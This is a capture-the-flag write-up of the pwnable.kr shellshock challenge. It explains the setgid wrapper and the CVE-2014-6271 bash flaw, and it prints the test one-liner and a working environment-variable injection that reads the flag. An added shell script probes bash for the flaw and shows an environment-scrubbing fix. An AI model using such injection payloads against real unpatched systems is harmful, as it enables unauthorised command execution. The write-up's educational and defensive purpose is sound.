Pwnable.kr - shellshock


Today I'm going to show you how to exploit a vulnerability in the shellshock challenge from pwnable.kr.

Solution

Firstly we’ll have to connect via ssh to the server hosting this challenge.

main:~ > ssh shellshock@pwnable.kr -p2222
shellshock@pwnable.kr's password:
shellshock@prowl:~$ ls -la
total 980
drwxr-x--- 5 root shellshock 4096 Oct 23 2016 .
drwxr-xr-x 87 root root 4096 Dec 27 23:17 ..
-r-xr-xr-x 1 root shellshock 959120 Oct 12 2014 bash
d--------- 2 root root 4096 Oct 12 2014 .bash_history
-r--r----- 1 root shellshock_pwn 47 Oct 12 2014 flag
dr-xr-xr-x 2 root root 4096 Oct 12 2014 .irssi
drwxr-xr-x 2 root root 4096 Oct 23 2016 .pwntools-cache
-r-xr-sr-x 1 root shellshock_pwn 8547 Oct 12 2014 shellshock
-r--r--r-- 1 root root 188 Oct 12 2014 shellshock.c

From here on we can play with the challenge. The first thing I notice is that flag is readable only by root and by members of the shellshock_pwn group (-r--r-----), and my user, shellshock, is not one of them. Luckily the shellshock binary is setgid (the s in its group permission bits): whoever runs it gets the effective group ID shellshock_pwn, the same group that owns the flag. Following my usual routine, I check the source code next.

#define _GNU_SOURCE      /* setresuid/setresgid are GNU extensions */
#include <stdio.h>
#include <stdlib.h>      /* system() */
#include <unistd.h>      /* setresuid, setresgid, getegid */
int main(){
    /* setgid binary: getegid() is shellshock_pwn. Copying it into the real
       and saved IDs keeps bash from dropping it (bash resets the effective
       GID to the real one when they differ). Feeding the GID to setresuid()
       is a quirk; for an unprivileged process it ordinarily fails with EPERM. */
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c 'echo shock_me'"); /* child inherits our environment */
    return 0;
}

To check what setresgid, setresuid and getegid actually do, I looked at their man pages. Here are the relevant excerpts.

setresuid() sets the real user ID, the effective user ID, and the
saved set-user-ID of the calling process.

An unprivileged process may change its real UID, effective UID,
and saved set-user-ID, each to one of: the current real UID, the
current effective UID or the current saved set-user-ID.

A privileged process (on Linux, one having the CAP_SETUID capa‐
bility) may set its real UID, effective UID, and saved set-user-
ID to arbitrary values.

If one of the arguments equals -1, the corresponding value is not
changed.

Completely analogously, setresgid() sets the real GID, effective
GID, and saved set-group-ID of the calling process (and always
modifies the filesystem GID to be the same as the effective GID),
with the same restrictions for unprivileged processes.
The getegid() function shall return the effective group ID of the
calling process.

In other words: because the binary is setgid, its effective GID at startup is already shellshock_pwn, and setresgid() copies that value into the real and saved GIDs as well. That detail matters for what comes next. When bash starts with an effective group ID different from the real one (and without -p), it resets the effective GID to the real one and also refuses to import shell functions from the environment. With all three GIDs equal, the bash spawned by system() keeps shellshock_pwn, the group that can read the flag, and keeps importing functions. That's good news.

Now let's look at the challenge name once again. Shellshock (CVE-2014-6271) is a bash vulnerability disclosed on 24 September 2014. Bash of that era imported a shell function from any environment variable whose value started with "() {", and while parsing that definition it also executed whatever followed the closing brace. Anyone who can place an environment variable in front of a vulnerable bash can therefore run arbitrary commands as the user (and group) that bash runs as.

The vulnerability can be tested with the following command. A vulnerable bash prints vulnerable followed by this is a test; a fixed bash prints only this is a test.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

We can reuse that snippet against the vulnerable bash bundled with the challenge. First, modify the payload so that it reads the flag for us.

export x="() { :;}; /bin/cat flag "

export does nothing more than put x into our environment. The chain is then: ./shellshock calls system(), which runs /bin/sh -c with that environment, which starts /home/shellshock/bash; that bash imports x as a function and executes the trailing /bin/cat flag with the effective GID shellshock_pwn. The relative path works because we run the binary from /home/shellshock, where flag lives. Then run the binary, just like that.

shellshock@prowl:~$ export x="() { :;}; /bin/cat flag "
shellshock@prowl:~$ ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

The flag line is the output of our injected cat. Note that the binary's own shock_me is never printed: the injected command runs while bash is still importing its environment, before the -c script, and the crash that follows comes after the flag has already been read, so it does not matter for the challenge.
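The test one-liner and the export-then-run sequence above can be packaged into something reusable. The script below is an added example written for this writeup, not part of the original post or of the challenge; it assumes a POSIX sh, takes the bash to probe as its first argument (defaulting to whatever bash is on PATH, a name chosen here for illustration), and only ever asks that bash to run echo and declare. shellshock_probe is the CVE-2014-6271 test as a function with a result you can branch on, imported_as shows whether a plain "() {" variable becomes a function at all, exported_function_var shows the namespaced variable a fixed bash uses instead, and run_with_clean_env is the mitigation the setgid wrapper should have applied: scrub the environment before handing control to a shell.

```shell
#!/bin/sh
# Added example (not from the original writeup or the challenge): the
# CVE-2014-6271 probes as functions, plus the environment-scrubbing fix.
# Assumptions: POSIX sh; the bash under test is $1 (default: "bash" on
# PATH); the probes run nothing but echo/declare inside the target bash.

# shellshock_probe [BASH] -> prints vulnerable|patched|missing
# exit status: 0 vulnerable, 1 patched, 2 binary not found
shellshock_probe() {
    target=${1:-bash}
    if ! command -v "$target" >/dev/null 2>&1; then
        echo missing
        return 2
    fi
    # Same shape as the one-liner: a function body followed by a trailing
    # command. A vulnerable bash imports x while initialising its environment
    # and runs the trailing command before it even looks at the -c script.
    out=$(env x='() { :;}; echo INJECTED' "$target" -c 'echo body' 2>/dev/null)
    case $out in
        *INJECTED*) echo vulnerable; return 0 ;;
        *)          echo patched;    return 1 ;;
    esac
}

# imported_as [BASH] -> prints function|string|missing: does a plain variable
# whose value starts with "() {" become a shell function inside the target?
imported_as() {
    target=${1:-bash}
    command -v "$target" >/dev/null 2>&1 || { echo missing; return 2; }
    # "declare -F x" prints "x" only if x exists as a function.
    if env x='() { :;}' "$target" -c 'declare -F x' 2>/dev/null | grep -qx x; then
        echo function
    else
        echo string
    fi
}

# exported_function_var [BASH] -> the environment variable name a fixed bash
# uses for an exported function named x. The fix namespaced these variables
# (BASH_FUNC_x%% upstream, BASH_FUNC_x() on some distributions), so an
# arbitrary variable called x is no longer a candidate for import.
exported_function_var() {
    target=${1:-bash}
    command -v "$target" >/dev/null 2>&1 || { echo missing; return 2; }
    "$target" -c 'x() { :; }; export -f x; env' 2>/dev/null \
        | grep '^BASH_FUNC_x' | cut -d= -f1
}

# run_with_clean_env BASH CMD... -> run CMD under the given bash with the
# caller's environment discarded (env -i) and a fixed PATH. This is what a
# setgid wrapper like the challenge binary should have done instead of
# system(): whoever controls the environment must not reach the shell with it.
run_with_clean_env() {
    target=$1
    shift
    env -i PATH=/usr/bin:/bin "$target" -c "$*"
}
```

On a fixed bash the three probes report patched, string and BASH_FUNC_x%% (or BASH_FUNC_x() on distributions that chose that spelling); on the challenge box, shellshock_probe /home/shellshock/bash is the call that reports vulnerable. The clean-environment variant is exactly what would have closed this challenge's attack path: with x gone from the environment there is nothing for the vulnerable bash to import, patched or not.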

Tools used

No external tools used.

Reference/notes

https://en.wikipedia.org/wiki/Shellshock_software_bug

https://www.owasp.org/images/1/1b/Shellshock_-_Tudor_Enache.pdf

http://seclists.org/oss-sec/2014/q3/650

https://blog.cloudflare.com/inside-shellshock/

Keep learning and stay safe! ~ W3ndige